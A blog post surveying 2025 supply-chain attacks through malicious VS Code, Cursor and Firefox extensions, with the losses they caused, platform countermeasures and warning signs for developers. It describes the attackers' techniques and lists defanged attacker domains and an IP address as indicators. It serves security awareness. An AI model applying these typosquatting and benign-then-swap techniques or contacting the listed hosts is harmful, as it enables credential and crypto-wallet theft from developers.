When the Store Is the Backdoor: IDE & Add-on Extensions Are the New Supply Chain
Shak
While scanning my daily news feeds in Feeder, one story keeps resurfacing: malicious code extensions targeting developers by manipulating marketplaces. It’s a reminder of an often overlooked attack vector in the developer ecosystem that deserves attention.
When Datadog Pulled Back the Curtain
- VS Code / Solidity (May 2025): Datadog uncovered three trojanized VS Code extensions - solaibot, among-eth, blankebesxstnion that targeted Windows-based Solidity developers. The extensions ran obfuscated code, fetched multi-stage payloads via PowerShell, and ultimately dropped a browser extension and Windows binaries to siphon credentials (including crypto wallet data). Microsoft removed them; cumulative installs were under 50 before takedown.
Cursor AI (June – July 2025) – Security researchers at Kaspersky uncovered a case where a developer lost around $500,000 in cryptocurrency after installing what appeared to be a legitimate “Solidity Language” coding add-on for the Cursor AI editor. Cursor supports extensions from the Open VSX registry, which also hosts plugins compatible with Visual Studio Code.
The malicious extension wasn’t just a coding tool, it quietly downloaded PowerShell scripts from attacker-controlled servers, installed ScreenConnect remote-access software, then deployed Quasar RAT (a remote access trojan) along with a custom data stealer. These tools siphoned off browser passwords, email credentials, and crypto wallet keys.
After the first fake extension was removed on July 2, the attackers uploaded a nearly identical copy, this time using a look-alike publisher name (“juanbIanco” instead of the legitimate “juanblanco”). For a short time, this counterfeit even outranked the real plugin in Cursor’s search results because the marketplace algorithm favoured recently updated packages. Researchers believe the inflated “~2 million downloads” shown in search was likely manipulated to create a false sense of trust and popularity.
Firefox add-ons (August 2025): Security researchers at Koi Security unveiled a sophisticated campaign code-named GreedyBear in which attackers published over 150 benign-seeming Firefox extensions, including ones mimicking popular crypto wallets like MetaMask, Exodus, and TronLink. They first uploaded safe utilities to build trust and positive reviews, then “hollowed out” these extensions (Extension Hollowing) replacing their code and assets with credential-stealing logic while retaining their good reputation. This technique bypassed initial reviews and leveraged users’ trust in rated extensions. The malicious updates captured wallet credentials and user IPs, funnelling over $1 million in losses before Mozilla removed the extensions.
How widespread is it?
The VS Code/Solidity wave: small initial install base (<50 downloads) before removal limited blast radius but high-value targeting.
The Cursor case: at least one instance confirmed a theft of $500k
The Firefox cluster: ~150 malicious add-ons, ~$1M drained before mass removal, evidence that extension ecosystems remain attractive monetisation vectors.
Safeguards that are in place
Marketplace takedowns & scanning (VS Code): Microsoft pulled the malicious Solidity extensions quickly. Datadog notes these ecosystems use automated scanning, but determined adversaries can still slip through with obfuscation and staged payloads.
Cursor AI hardening (late July 2025): After responsible disclosure on July 16, Cursor v1.3 changed its trust model: any change to an approved MCP configuration now requires re-approval, cutting off “benign-then-swap” abuse routes for persistent code execution (CVE-2025-54136, “MCPoison”).
Firefox early-detection system (June 2025): Mozilla introduced automated risk-profiling for wallet extensions and new review heuristics for crypto-drainer behaviours, essentially a front-door tripwire before extensions “find traction.”
Is This a New Threat or Just an Old One Evolving?
This isn’t a brand-new problem it’s a familiar attack model getting sharper. Supply chain compromises through plugins, add-ons, and open-source packages have been around for years. What’s different now is the convergence: multiple marketplaces, similar tactics, and a focus on high-value technical users.
Safe at first and then the good old switcheroo trick
Both the GreedyBear Firefox campaign and the recent IDE extension cases relied on the same playbook, publish harmless code to pass review, then quietly swap in wallet-draining or credential-stealing logic once the extension gains trust
Typosquatting meets algorithm gaming
In the Cursor incident, the fake “juanbIanco” publisher (just one letter off from the real “juanblanco”) used recency-weighted search rankings to leapfrog the legitimate package, exploiting how the marketplace surfaces “fresh” updates.
Same fingerprints across campaigns
Kaspersky found that the malicious Cursor plugin’s scripts and payload chain closely matched earlier VS Code attacks in April–May 2025 (solaibot, among-eth, blankebesxstnion). Datadog also saw attackers updating payloads after discovery, evidence of an active and iterative operation, whether from the same group or skilled imitators.
Why it matters
Security analysts agree: malicious open-source and extension packages are a low-volume, high-impact threat. Few victims, but those victims are often developers with access to valuable code, keys, and infrastructure making lateral movement and follow-on compromise far more damaging than a broad, noisy attack.
Practical red flags to watch for
Suspicious network calls and hidden loaders
In the VS Code/Solidity attack, the extensions reached out to solidity[.]bot/version.json a signal to trigger Windows-only PowerShell scripts. These scripts pulled hidden payloads from unexpected places, like image files on the Internet Archive, and dropped suspicious executables (myau.exe, myaunet.exe).
In the Cursor case, the plugin fetched scripts from angelic[.]su and paste[.]ee, installed ScreenConnect from lmfao[.]su, and connected to attacker servers at 144.172.112[.]84 / relay.lmfao[.]su. From there, it deployed Quasar RAT and a custom data stealer.
Look-alike publisher names
One fake plugin used the name “juanbIanco” instead of the real “juanblanco.” The subtle font differences between a capital “I” and lowercase “l” made them almost impossible to tell apart. The lesson: don’t rely on the display name alone, check if the publisher is verified.
Search results that don’t make sense
In the Open VSX/Cursor ecosystem, recently updated and artificially padded packages briefly outranked trusted ones. If the top result is unverified, brand new, or updated just yesterday, be skeptical.
Good today, bad tomorrow
In the Firefox campaign, attackers uploaded safe extensions that passed review then later swapped in wallet-draining code. This “benign-then-malicious” tactic is now something marketplaces actively look for, but it still happens.
Could it happen again?
Yes. The incentives are strong and the path is repeatable: typosquat, a trusted tool, ship benign code to pass checks, flip the switch later. Even with Mozilla’s new risk-profiling and Cursor’s MCP re-approval, extension ecosystems remain a cat-and-mouse game where motivated actors can iterate until something sticks. Datadog’s observation that operators changed payloads after exposure is the tell. Expect more surgical, financially motivated campaigns against dev tools and wallet surfaces.
Sources & further reading
Subscribe to my newsletter
Read articles from Shak directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by